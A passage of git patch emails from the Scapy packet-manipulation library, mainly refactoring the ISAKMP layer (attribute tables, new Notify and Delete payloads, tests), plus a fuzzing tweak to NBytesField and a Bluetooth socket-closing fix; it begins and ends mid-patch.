/ - IKEv2_payload_TSr( + IKEv2_TSr( next_payload='VendorID', - res=0, + flags='', length=24, number_of_TSs=1, res2=0x0, @@ -1342,15 +1340,15 @@ frames = [ ) ] ) / - IKEv2_payload_VendorID( + IKEv2_VendorID( next_payload='Notify', - res=0, + flags='', length=20, vendorID=b'\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00' ) / - IKEv2_payload_Notify( + IKEv2_Notify( next_payload='None', - res=0, + flags='', length=8, proto='Reserved', SPIsize=0, From c687f09be9cca21b68f50ee5adfadfd59c644096 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 5 Mar 2023 15:30:26 +0100 Subject: [PATCH 0981/1632] Various cleanups to ISAKMP (#3798) * Various cleanups to ISAKMP * Minor fixes * Handle Attributes from Phase 1 & 2 --- scapy/fields.py | 14 +- scapy/layers/isakmp.py | 467 ++++++++++++++++++++++------------- test/scapy/layers/isakmp.uts | 42 ++-- 3 files changed, 337 insertions(+), 186 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index f820e183ae2..1eb3d327daf 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1528,15 +1528,19 @@ def randval(self): return fuzz(self.cls()) # type: ignore -class PacketField(_PacketField[BasePacket]): +class _PacketFieldSingle(_PacketField[K]): def any2i(self, pkt, x): - # type: (Optional[Packet], BasePacket) -> BasePacket + # type: (Optional[Packet], Any) -> K if x and pkt and hasattr(x, "add_parent"): cast("Packet", x).add_parent(pkt) - return super(PacketField, self).any2i(pkt, x) + return super(_PacketFieldSingle, self).any2i(pkt, x) -class PacketLenField(_PacketField[Optional[BasePacket]]): +class PacketField(_PacketFieldSingle[BasePacket]): + pass + + +class PacketLenField(_PacketFieldSingle[Optional[BasePacket]]): __slots__ = ["length_from"] def __init__(self, @@ -1553,7 +1557,7 @@ def getfield(self, pkt, # type: Packet s, # type: bytes ): - # type: (...) -> Tuple[bytes, Optional[Packet]] + # type: (...) -> Tuple[bytes, Optional[BasePacket]] len_pkt = self.length_from(pkt) i = None if len_pkt: diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index ae4ed466d7f..af3331d63e3 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -11,11 +11,23 @@ import struct from scapy.config import conf -from scapy.packet import Packet, bind_bottom_up, bind_top_down +from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers from scapy.compat import chb -from scapy.fields import ByteEnumField, ByteField, FieldLenField, FlagsField, \ - IntEnumField, IntField, PacketLenField, ShortEnumField, ShortField, \ - StrFixedLenField, StrLenField, XByteField +from scapy.fields import ( + ByteEnumField, + ByteField, + FieldLenField, + FieldListField, + FlagsField, + IntEnumField, + IntField, + PacketLenField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + XByteField, +) from scapy.layers.inet import IP, UDP from scapy.sendrecv import sr from scapy.volatile import RandString @@ -26,96 +38,125 @@ # and inherit a default ISAKMP_payload -# see http://www.iana.org/assignments/ipsec-registry for details -ISAKMPAttributeTypes = {"Encryption": (1, {"DES-CBC": 1, - "IDEA-CBC": 2, - "Blowfish-CBC": 3, - "RC5-R16-B64-CBC": 4, - "3DES-CBC": 5, - "CAST-CBC": 6, - "AES-CBC": 7, - "CAMELLIA-CBC": 8, }, 0), - "Hash": (2, {"MD5": 1, - "SHA": 2, - "Tiger": 3, - "SHA2-256": 4, - "SHA2-384": 5, - "SHA2-512": 6, }, 0), - "Authentication": (3, {"PSK": 1, - "DSS": 2, - "RSA Sig": 3, - "RSA Encryption": 4, - "RSA Encryption Revised": 5, - "ElGamal Encryption": 6, - "ElGamal Encryption Revised": 7, - "ECDSA Sig": 8, - "HybridInitRSA": 64221, - "HybridRespRSA": 64222, - "HybridInitDSS": 64223, - "HybridRespDSS": 64224, - "XAUTHInitPreShared": 65001, - "XAUTHRespPreShared": 65002, - "XAUTHInitDSS": 65003, - "XAUTHRespDSS": 65004, - "XAUTHInitRSA": 65005, - "XAUTHRespRSA": 65006, - "XAUTHInitRSAEncryption": 65007, - "XAUTHRespRSAEncryption": 65008, - "XAUTHInitRSARevisedEncryption": 65009, # noqa: E501 - "XAUTHRespRSARevisedEncryptio": 65010, }, 0), # noqa: E501 - "GroupDesc": (4, {"768MODPgr": 1, - "1024MODPgr": 2, - "EC2Ngr155": 3, - "EC2Ngr185": 4, - "1536MODPgr": 5, - "2048MODPgr": 14, - "3072MODPgr": 15, - "4096MODPgr": 16, - "6144MODPgr": 17, - "8192MODPgr": 18, }, 0), - "GroupType": (5, {"MODP": 1, - "ECP": 2, - "EC2N": 3}, 0), - "GroupPrime": (6, {}, 1), - "GroupGenerator1": (7, {}, 1), - "GroupGenerator2": (8, {}, 1), - "GroupCurveA": (9, {}, 1), - "GroupCurveB": (10, {}, 1), - "LifeType": (11, {"Seconds": 1, - "Kilobytes": 2}, 0), - "LifeDuration": (12, {}, 1), - "PRF": (13, {}, 0), - "KeyLength": (14, {}, 0), - "FieldSize": (15, {}, 0), - "GroupOrder": (16, {}, 1), - } - -# the name 'ISAKMPTransformTypes' is actually a misnomer (since the table -# holds info for all ISAKMP Attribute types, not just transforms, but we'll -# keep it for backwards compatibility... for now at least -ISAKMPTransformTypes = ISAKMPAttributeTypes - -ISAKMPTransformNum = {} -for n in ISAKMPTransformTypes: - val = ISAKMPTransformTypes[n] - tmp = {} - for e in val[1]: - tmp[val[1][e]] = e - ISAKMPTransformNum[val[0]] = (n, tmp, val[2]) -del n -del e -del tmp -del val +# see https://www.iana.org/assignments/ipsec-registry/ipsec-registry.xhtml#ipsec-registry-2 for details # noqa: E501 +ISAKMPAttributeTypes = { + "Encryption": (1, {"DES-CBC": 1, + "IDEA-CBC": 2, + "Blowfish-CBC": 3, + "RC5-R16-B64-CBC": 4, + "3DES-CBC": 5, + "CAST-CBC": 6, + "AES-CBC": 7, + "CAMELLIA-CBC": 8, }, 0), + "Hash": (2, {"MD5": 1, + "SHA": 2, + "Tiger": 3, + "SHA2-256": 4, + "SHA2-384": 5, + "SHA2-512": 6, }, 0), + "Authentication": (3, {"PSK": 1, + "DSS": 2, + "RSA Sig": 3, + "RSA Encryption": 4, + "RSA Encryption Revised": 5, + "ElGamal Encryption": 6, + "ElGamal Encryption Revised": 7, + "ECDSA Sig": 8, + "HybridInitRSA": 64221, + "HybridRespRSA": 64222, + "HybridInitDSS": 64223, + "HybridRespDSS": 64224, + "XAUTHInitPreShared": 65001, + "XAUTHRespPreShared": 65002, + "XAUTHInitDSS": 65003, + "XAUTHRespDSS": 65004, + "XAUTHInitRSA": 65005, + "XAUTHRespRSA": 65006, + "XAUTHInitRSAEncryption": 65007, + "XAUTHRespRSAEncryption": 65008, + "XAUTHInitRSARevisedEncryption": 65009, # noqa: E501 + "XAUTHRespRSARevisedEncryptio": 65010, }, 0), # noqa: E501 + "GroupDesc": (4, {"768MODPgr": 1, + "1024MODPgr": 2, + "EC2Ngr155": 3, + "EC2Ngr185": 4, + "1536MODPgr": 5, + "2048MODPgr": 14, + "3072MODPgr": 15, + "4096MODPgr": 16, + "6144MODPgr": 17, + "8192MODPgr": 18, }, 0), + "GroupType": (5, {"MODP": 1, + "ECP": 2, + "EC2N": 3}, 0), + "GroupPrime": (6, {}, 1), + "GroupGenerator1": (7, {}, 1), + "GroupGenerator2": (8, {}, 1), + "GroupCurveA": (9, {}, 1), + "GroupCurveB": (10, {}, 1), + "LifeType": (11, {"Seconds": 1, + "Kilobytes": 2}, 0), + "LifeDuration": (12, {}, 1), + "PRF": (13, {}, 0), + "KeyLength": (14, {}, 0), + "FieldSize": (15, {}, 0), + "GroupOrder": (16, {}, 1), +} + +# see https://www.iana.org/assignments/isakmp-registry/isakmp-registry.xhtml#isakmp-registry-13 for details # noqa: E501 +IPSECAttributeTypes = { + "LifeType": (1, {"Reserved": 0, + "seconds": 1, + "kilobytes": 2}, 0), + "LifeDuration": (2, {}, 1), + "GroupDesc": (3, ISAKMPAttributeTypes["GroupDesc"][1], 0), + "EncapsulationMode": (4, {"Reserved": 0, + "Tunnel": 1, + "Transport": 2, + "UDP-Encapsulated-Tunnel": 3, + "UDP-Encapsulated-Transport": 4}, 0), + "AuthenticationAlgorithm": (5, {"HMAC-MD5": 1, + "HMAC-SHA": 2, + "DES-MAC": 3, + "KPDK": 4, + "HMAC-SHA2-256": 5, + "HMAC-SHA2-384": 6, + "HMAC-SHA2-512": 7, + "HMAC-RIPEMD": 8, + "AES-XCBC-MAC": 9, + "SIG-RSA": 10, + "AES-128-GMAC": 11, + "AES-192-GMAC": 12, + "AES-256-GMAC": 13}, 0), + "KeyLength": (6, {}, 0), + "KeyRounds": (7, {}, 0), + "CompressDictionarySize": (8, {}, 0), + "CompressPrivateAlgorithm": (9, {}, 1), +} + +_rev = lambda x: { + v[0]: (k, {vv: kk for kk, vv in v[1].items()}, v[2]) + for k, v in x.items() +} +ISAKMPTransformNum = _rev(ISAKMPAttributeTypes) +IPSECTransformNum = _rev(IPSECAttributeTypes) class ISAKMPTransformSetField(StrLenField): islist = 1 @staticmethod - def type2num(type_val_tuple): + def type2num(type_val_tuple, doi=0): typ, val = type_val_tuple - type_val, enc_dict, tlv = ISAKMPTransformTypes.get(typ, (typ, {}, 0)) + if doi == 0: + type_val, enc_dict, tlv = ISAKMPAttributeTypes.get(typ, (typ, {}, 0)) + elif doi == 1: + type_val, enc_dict, tlv = IPSECAttributeTypes.get(typ, (typ, {}, 0)) + else: + type_val, enc_dict, tlv = (typ, {}, 0) val = enc_dict.get(val, val) + if isinstance(val, str): + raise ValueError("Unknown attribute '%s'" % val) s = b"" if (val & ~0xffff): if not tlv: @@ -131,15 +172,30 @@ def type2num(type_val_tuple): return struct.pack("!HH", type_val, val) + s @staticmethod - def num2type(typ, enc): - val = ISAKMPTransformNum.get(typ, (typ, {})) + def num2type(typ, enc, doi=0): + if doi == 0: + val = ISAKMPTransformNum.get(typ, (typ, {})) + elif doi == 1: + val = IPSECTransformNum.get(typ, (typ, {})) + else: + val = (typ, {}) enc = val[1].get(enc, enc) return (val[0], enc) + def _get_doi(self, pkt): + # Ugh + cur = pkt + while cur and getattr(cur, "doi", None) is None: + cur = cur.parent or cur.underlayer + if cur is None: + return 0 + return cur.doi + def i2m(self, pkt, i): if i is None: return b"" - i = [ISAKMPTransformSetField.type2num(e) for e in i] + doi = self._get_doi(pkt) + i = [ISAKMPTransformSetField.type2num(e, doi=doi) for e in i] return b"".join(i) def m2i(self, pkt, m): @@ -149,6 +205,7 @@ def m2i(self, pkt, m): # worst case that should result in broken attributes (which would # be expected). (wam) lst = [] + doi = self._get_doi(pkt) while len(m) >= 4: trans_type, = struct.unpack("!H", m[:2]) is_tlv = not (trans_type & 0x8000) @@ -166,33 +223,58 @@ def m2i(self, pkt, m): value_len = 0 value, = struct.unpack("!H", m[2:4]) m = m[4 + value_len:] - lst.append(ISAKMPTransformSetField.num2type(trans_type, value)) + lst.append(ISAKMPTransformSetField.num2type(trans_type, value, doi=doi)) if len(m) > 0: warning("Extra bytes after ISAKMP transform dissection [%r]" % m) return lst -ISAKMP_payload_type = ["None", "SA", "Proposal", "Transform", "KE", "ID", - "CERT", "CR", "Hash", "SIG", "Nonce", "Notification", - "Delete", "VendorID"] - -ISAKMP_exchange_type = ["None", "base", "identity prot.", - "auth only", "aggressive", "info"] - - -class ISAKMP_class(Packet): - def guess_payload_class(self, payload): - np = self.next_payload - if np == 0: +ISAKMP_payload_type = { + 0: "None", + 1: "SA", + 2: "Proposal", + 3: "Transform", + 4: "KE", + 5: "ID", + 6: "CERT", + 7: "CR", + 8: "Hash", + 9: "SIG", + 10: "Nonce", + 11: "Notification", + 12: "Delete", + 13: "VendorID", +} + +ISAKMP_exchange_type = { + 0: "None", + 1: "base", + 2: "identity protection", + 3: "authentication only", + 4: "aggressive", + 5: "informational" +} + +ISAKMP_protos = { + 1: "ISAKMP", +} + +ISAKMP_doi = { + 0: "ISAKMP", + 1: "IPSEC", +} + + +class _ISAKMP_class(Packet): + def default_payload_class(self, payload): + if self.next_payload == 0: return conf.raw_layer - elif np < len(ISAKMP_payload_type): - pt = ISAKMP_payload_type[np] - return globals().get("ISAKMP_payload_%s" % pt, ISAKMP_payload) - else: - return ISAKMP_payload + return ISAKMP_payload + +# -- ISAKMP -class ISAKMP(ISAKMP_class): # rfc2408 +class ISAKMP(_ISAKMP_class): # rfc2408 name = "ISAKMP" fields_desc = [ StrFixedLenField("init_cookie", "", 8), @@ -200,7 +282,7 @@ class ISAKMP(ISAKMP_class): # rfc2408 ByteEnumField("next_payload", 0, ISAKMP_payload_type), XByteField("version", 0x10), ByteEnumField("exch_type", 0, ISAKMP_exchange_type), - FlagsField("flags", 0, 8, ["encryption", "commit", "auth_only", "res3", "res4", "res5", "res6", "res7"]), # XXX use a Flag field # noqa: E501 + FlagsField("flags", 0, 8, ["encryption", "commit", "auth_only"]), IntField("id", 0), IntField("length", None) ] @@ -208,7 +290,7 @@ class ISAKMP(ISAKMP_class): # rfc2408 def guess_payload_class(self, payload): if self.flags & 1: return conf.raw_layer - return ISAKMP_class.guess_payload_class(self, payload) + return _ISAKMP_class.guess_payload_class(self, payload) def answers(self, other): if isinstance(other, ISAKMP): @@ -223,15 +305,32 @@ def post_build(self, p, pay): return p -class ISAKMP_payload_Transform(ISAKMP_class): - name = "IKE Transform" +# -- ISAKMP payloads + +class ISAKMP_payload(_ISAKMP_class): + name = "ISAKMP payload" fields_desc = [ ByteEnumField("next_payload", None, ISAKMP_payload_type), ByteField("res", 0), - # ShortField("len",None), ShortField("length", None), - ByteField("num", None), - ByteEnumField("id", 1, {1: "KEY_IKE"}), + StrLenField("load", "", length_from=lambda x:x.length - 4), + ] + + def post_build(self, pkt, pay): + if self.length is None: + pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] + return pkt + pay + + +class ISAKMP_payload_Transform(ISAKMP_payload): + name = "IKE Transform" + deprecated_fields = { + "num": ("transform_count", ("2.5.0")), + "id": ("transform_id", ("2.5.0")), + } + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + ByteField("transform_count", None), + ByteEnumField("transform_id", 1, {1: "KEY_IKE"}), ShortField("res2", 0), ISAKMPTransformSetField("transforms", None, length_from=lambda x: x.length - 8) # noqa: E501 # XIntField("enc",0x80010005L), @@ -243,25 +342,13 @@ class ISAKMP_payload_Transform(ISAKMP_class): # XIntField("durationl",0x00007080L), ] - def post_build(self, p, pay): - if self.length is None: - tmp_len = len(p) - tmp_pay = p[:2] + chb((tmp_len >> 8) & 0xff) - p = tmp_pay + chb(tmp_len & 0xff) + p[4:] - p += pay - return p - # https://tools.ietf.org/html/rfc2408#section-3.5 -class ISAKMP_payload_Proposal(ISAKMP_class): +class ISAKMP_payload_Proposal(ISAKMP_payload): name = "IKE proposal" -# ISAKMP_payload_type = 0 - fields_desc = [ - ByteEnumField("next_payload", None, ISAKMP_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "trans", "H", adjust=lambda pkt, x:x + 8), # noqa: E501 + fields_desc = ISAKMP_payload.fields_desc[:3] + [ ByteField("proposal", 1), - ByteEnumField("proto", 1, {1: "ISAKMP"}), + ByteEnumField("proto", 1, ISAKMP_protos), FieldLenField("SPIsize", None, "SPI", "B"), ByteField("trans_nb", None), StrLenField("SPI", "", length_from=lambda x: x.SPIsize), @@ -269,27 +356,14 @@ class ISAKMP_payload_Proposal(ISAKMP_class): ] -class ISAKMP_payload(ISAKMP_class): - name = "ISAKMP payload" - fields_desc = [ - ByteEnumField("next_payload", None, ISAKMP_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 4), - StrLenField("load", "", length_from=lambda x:x.length - 4), - ] - - class ISAKMP_payload_VendorID(ISAKMP_payload): name = "ISAKMP Vendor ID" -class ISAKMP_payload_SA(ISAKMP_class): +class ISAKMP_payload_SA(ISAKMP_payload): name = "ISAKMP SA" - fields_desc = [ - ByteEnumField("next_payload", None, ISAKMP_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "prop", "H", adjust=lambda pkt, x:x + 12), # noqa: E501 - IntEnumField("DOI", 1, {1: "IPSEC"}), + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + IntEnumField("doi", 1, ISAKMP_doi), IntEnumField("situation", 1, {1: "identity"}), PacketLenField("prop", conf.raw_layer(), ISAKMP_payload_Proposal, length_from=lambda x: x.length - 12), # noqa: E501 ] @@ -303,12 +377,9 @@ class ISAKMP_payload_KE(ISAKMP_payload): name = "ISAKMP Key Exchange" -class ISAKMP_payload_ID(ISAKMP_class): +class ISAKMP_payload_ID(ISAKMP_payload): name = "ISAKMP Identification" - fields_desc = [ - ByteEnumField("next_payload", None, ISAKMP_payload_type), - ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + fields_desc = ISAKMP_payload.fields_desc[:3] + [ ByteEnumField("IDtype", 1, {1: "IPv4_addr", 11: "Key"}), ByteEnumField("ProtoID", 0, {0: "Unused"}), ShortEnumField("Port", 0, {0: "Unused"}), @@ -321,26 +392,88 @@ class ISAKMP_payload_Hash(ISAKMP_payload): name = "ISAKMP Hash" +NotifyMessageType = { + 1: "INVALID-PAYLOAD-TYPE", + 2: "DOI-NOT-SUPPORTED", + 3: "SITUATION-NOT-SUPPORTED", + 4: "INVALID-COOKIE", + 5: "INVALID-MAJOR-VERSION", + 6: "INVALID-MINOR-VERSION", + 7: "INVALID-EXCHANGE-TYPE", + 8: "INVALID-FLAGS", + 9: "INVALID-MESSAGE-ID", + 10: "INVALID-PROTOCOL-ID", + 11: "INVALID-SPI", + 12: "INVALID-TRANSFORM-ID", + 13: "ATTRIBUTES-NOT-SUPPORTED", + 14: "NO-PROPOSAL-CHOSEN", + 15: "BAD-PROPOSAL-SYNTAX", + 16: "PAYLOAD-MALFORMED", + 17: "INVALID-KEY-INFORMATION", + 18: "INVALID-ID-INFORMATION", + 19: "INVALID-CERT-ENCODING", + 20: "INVALID-CERTIFICATE", + 21: "CERT-TYPE-UNSUPPORTED", + 22: "INVALID-CERT-AUTHORITY", + 23: "INVALID-HASH-INFORMATION", + 24: "AUTHENTICATION-FAILED", + 25: "INVALID-SIGNATURE", + 26: "ADDRESS-NOTIFICATION", + 27: "NOTIFY-SA-LIFETIME", + 28: "CERTIFICATE-UNAVAILABLE", + 29: "UNSUPPORTED-EXCHANGE-TYPE", + # RFC 3706 + 36136: "R-U-THERE", + 36137: "R-U-THERE-ACK", +} + + +class ISAKMP_payload_Notify(ISAKMP_payload): + name = "ISAKMP Notify (Notification)" + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + IntEnumField("doi", 0, ISAKMP_doi), + ByteEnumField("proto", 1, ISAKMP_protos), + FieldLenField("SPIsize", None, "SPI", "B"), + ShortEnumField("notify_msg_type", None, NotifyMessageType), + StrLenField("SPI", "", length_from=lambda x: x.SPIsize), + StrLenField("notify_data", "", + length_from=lambda x: x.length - x.SPIsize - 12) + ] + + +class ISAKMP_payload_Delete(ISAKMP_payload): + name = "ISAKMP Delete" + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + IntEnumField("doi", 0, ISAKMP_doi), + ByteEnumField("proto", 1, ISAKMP_protos), + FieldLenField("SPIsize", None, length_of="SPIs", fmt="B", + adjust=lambda pkt, x: x and x // len(pkt.SPIs)), + FieldLenField("SPIcount", None, count_of="SPIs", fmt="H"), + FieldListField("SPIs", [], + StrLenField("", "", length_from=lambda pkt: pkt.SPIsize), + count_from=lambda pkt: pkt.SPIcount), + ] + + bind_bottom_up(UDP, ISAKMP, dport=500) bind_bottom_up(UDP, ISAKMP, sport=500) bind_top_down(UDP, ISAKMP, dport=500, sport=500) -# Add building bindings -# (Dissection bindings are located in ISAKMP_class.guess_payload_class) -bind_top_down(ISAKMP_class, ISAKMP_payload, next_payload=0) -bind_top_down(ISAKMP_class, ISAKMP_payload_SA, next_payload=1) -bind_top_down(ISAKMP_class, ISAKMP_payload_Proposal, next_payload=2) -bind_top_down(ISAKMP_class, ISAKMP_payload_Transform, next_payload=3) -bind_top_down(ISAKMP_class, ISAKMP_payload_KE, next_payload=4) -bind_top_down(ISAKMP_class, ISAKMP_payload_ID, next_payload=5) -# bind_top_down(ISAKMP_class, ISAKMP_payload_CERT, next_payload=6) -# bind_top_down(ISAKMP_class, ISAKMP_payload_CR, next_payload=7) -bind_top_down(ISAKMP_class, ISAKMP_payload_Hash, next_payload=8) -# bind_top_down(ISAKMP_class, ISAKMP_payload_SIG, next_payload=9) -bind_top_down(ISAKMP_class, ISAKMP_payload_Nonce, next_payload=10) -# bind_top_down(ISAKMP_class, ISAKMP_payload_Notification, next_payload=11) -# bind_top_down(ISAKMP_class, ISAKMP_payload_Delete, next_payload=12) -bind_top_down(ISAKMP_class, ISAKMP_payload_VendorID, next_payload=13) +# Add bindings +bind_top_down(_ISAKMP_class, ISAKMP_payload, next_payload=0) +bind_layers(_ISAKMP_class, ISAKMP_payload_SA, next_payload=1) +bind_layers(_ISAKMP_class, ISAKMP_payload_Proposal, next_payload=2) +bind_layers(_ISAKMP_class, ISAKMP_payload_Transform, next_payload=3) +bind_layers(_ISAKMP_class, ISAKMP_payload_KE, next_payload=4) +bind_layers(_ISAKMP_class, ISAKMP_payload_ID, next_payload=5) +# bind_layers(_ISAKMP_class, ISAKMP_payload_CERT, next_payload=6) +# bind_layers(_ISAKMP_class, ISAKMP_payload_CR, next_payload=7) +bind_layers(_ISAKMP_class, ISAKMP_payload_Hash, next_payload=8) +# bind_layers(_ISAKMP_class, ISAKMP_payload_SIG, next_payload=9) +bind_layers(_ISAKMP_class, ISAKMP_payload_Nonce, next_payload=10) +bind_layers(_ISAKMP_class, ISAKMP_payload_Notify, next_payload=11) +bind_layers(_ISAKMP_class, ISAKMP_payload_Delete, next_payload=12) +bind_layers(_ISAKMP_class, ISAKMP_payload_VendorID, next_payload=13) def ikescan(ip): diff --git a/test/scapy/layers/isakmp.uts b/test/scapy/layers/isakmp.uts index 2cb3cbf2cca..4e20653fe90 100644 --- a/test/scapy/layers/isakmp.uts +++ b/test/scapy/layers/isakmp.uts @@ -4,32 +4,46 @@ ############ ############ + ISAKMP tests +~ ISAKMP -= ISAKMP creation -~ IP UDP ISAKMP -p=IP(src='192.168.8.14',dst='10.0.0.1')/UDP()/ISAKMP()/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal(trans=ISAKMP_payload_Transform(transforms=[('Encryption', 'AES-CBC'), ('Hash', 'MD5'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400)])/ISAKMP_payload_Transform(res2=12345,transforms=[('Encryption', '3DES-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1024MODPgr'), ('LifeType', 'Seconds'), ('LifeDuration', 86400)]))) -p.show() -p - += ISAKMP_payload_Transform +p=IP(src='192.168.8.14',dst='10.0.0.1')/UDP()/ISAKMP()/ISAKMP_payload_SA(doi=0, prop=ISAKMP_payload_Proposal(trans=ISAKMP_payload_Transform(transforms=[('Encryption', 'AES-CBC'), ('Hash', 'MD5'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400)])/ISAKMP_payload_Transform(res2=12345,transforms=[('Encryption', '3DES-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1024MODPgr'), ('LifeType', 'Seconds'), ('LifeDuration', 86400)]))) -= ISAKMP manipulation -~ ISAKMP r = p[ISAKMP_payload_Transform:2] r r.res2 == 12345 -= ISAKMP assembly -~ ISAKMP += ISAKMP_payload_Transform build hexdump(p) -raw(p) == b"E\x00\x00\x96\x00\x01\x00\x00@\x11\xa7\x9f\xc0\xa8\x08\x0e\n\x00\x00\x01\x01\xf4\x01\xf4\x00\x82\xbf\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00^\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00R\x01\x01\x00\x00\x03\x00\x00'\x00\x01\x00\x00\x80\x01\x00\x07\x80\x02\x00\x01\x80\x03\x00\x01\x80\x04\x00\x05\x80\x0e\x01\x00\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80\x00\x00\x00#\x00\x0109\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80" - +assert raw(p) == b"E\x00\x00\x96\x00\x01\x00\x00@\x11\xa7\x9f\xc0\xa8\x08\x0e\n\x00\x00\x01\x01\xf4\x01\xf4\x00\x82\xbf\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00^\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00R\x01\x01\x00\x00\x03\x00\x00'\x00\x01\x00\x00\x80\x01\x00\x07\x80\x02\x00\x01\x80\x03\x00\x01\x80\x04\x00\x05\x80\x0e\x01\x00\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80\x00\x00\x00#\x00\x0109\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02\x80\x0b\x00\x01\x00\x0c\x00\x03\x01Q\x80" -= ISAKMP disassembly -~ ISAKMP += ISAKMP_payload_Transform dissection q=IP(raw(p)) q.show() r = q[ISAKMP_payload_Transform:2] r r.res2 == 12345 += ISAKMP_payload_Notify + +pkt = ISAKMP()/ISAKMP_payload_Notify( + notify_msg_type="INVALID-FLAGS", + notify_data="Erreur", +)/ISAKMP_payload_Notify() + +assert bytes(pkt) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x0b\x00\x00\x12\x00\x00\x00\x00\x01\x00\x00\x08Erreur\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x00\x00\x00' + +pkt = ISAKMP(bytes(pkt)) +assert pkt[ISAKMP_payload_Notify].notify_data == b"Erreur" +assert not pkt[ISAKMP_payload_Notify:2].next_payload + += ISAKMP_payload_delete +pkt = ISAKMP()/ISAKMP_payload_Delete() +pkt.SPIs = [b"A" * 16, b"B" * 16] +assert raw(pkt) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00,\x00\x00\x00\x00\x01\x10\x00\x02AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB' +pkt = ISAKMP(raw(pkt)) +assert pkt.SPIcount == 2 +assert pkt.SPIsize == 16 +assert pkt.length == 72 +assert pkt[ISAKMP_payload_Delete].length == 44 From 57777578be6f0873d638df240c25513e20b83e4e Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 4 Feb 2023 04:35:03 +0000 Subject: [PATCH 0982/1632] Make NBytesField a bit more fuzzable The default randval function inherited from the Field class generates values from 0 to 255 because the "fmt" signature of NBytesFields ends with "B". Because of that only the last byte is different: ``` >>> hexdump(f) 0000 00 00 00 00 00 00 00 00 00 45 .........E >>> hexdump(f) 0000 00 00 00 00 00 00 00 00 00 50 .........P >>> hexdump(f) 0000 00 00 00 00 00 00 00 00 00 DD .......... ``` With this patch applied randval uses the whole range and all the bytes are involved in fuzzing: ``` >>> hexdump(f) 0000 F2 50 65 CE 2D A7 11 95 E7 32 .Pe.-....2 >>> hexdump(f) 0000 71 22 B3 4E 52 28 41 91 03 2C q".NR(A.., >>> hexdump(f) 0000 97 61 93 29 E4 AC 10 A8 8F 02 .a.)...... ``` --- scapy/fields.py | 4 ++++ test/fields.uts | 7 +++++++ 2 files changed, 11 insertions(+) diff --git a/scapy/fields.py b/scapy/fields.py index 1eb3d327daf..a13e19d39f4 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1110,6 +1110,10 @@ def getfield(self, pkt, s): return (s[self.sz:], self.m2i(pkt, self.struct.unpack(s[:self.sz]))) # type: ignore + def randval(self): + # type: () -> RandNum + return RandNum(0, 2 ** (self.sz * 8) - 1) + class XNBytesField(NBytesField): def i2repr(self, pkt, x): diff --git a/test/fields.uts b/test/fields.uts index 882b2369ef1..193787aa0c4 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -183,6 +183,13 @@ assert p.test2 == 0xc000ff3333 assert p.test3 == 0xffeeddccbbaa9988776655 assert p.test4 == 309404098707666285700277845 +class TestFuzzNBytesField(Packet): + fields_desc = [ + NBytesField('test1', 0, 128), + ] + +f = fuzz(TestFuzzNBytesField()) +assert f.test1.max == 2 ** (128 * 8) - 1 = StrField ~ field strfield From 6f4465d56208f15300c1bc3c68c86cabbbfc1cce Mon Sep 17 00:00:00 2001 From: virtualabs Date: Thu, 2 Feb 2023 16:54:13 +0100 Subject: [PATCH 0983/1632] Fix bug #191 BluetoothUserSocket did not close the first socket returned by the first call to socket(), leaving this socket alive. OS returns "Device or resource busy" because of this when one try to instanciate a new BluetoothUserSocket. Closing this first socket in BluetoothUserSocket's `close()` method free all the file descriptors and solved this issue. --- scapy/layers/bluetooth.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 51a13e9ee65..a584e4bf696 100644 --- a/scapy/layers/bluetooth.py 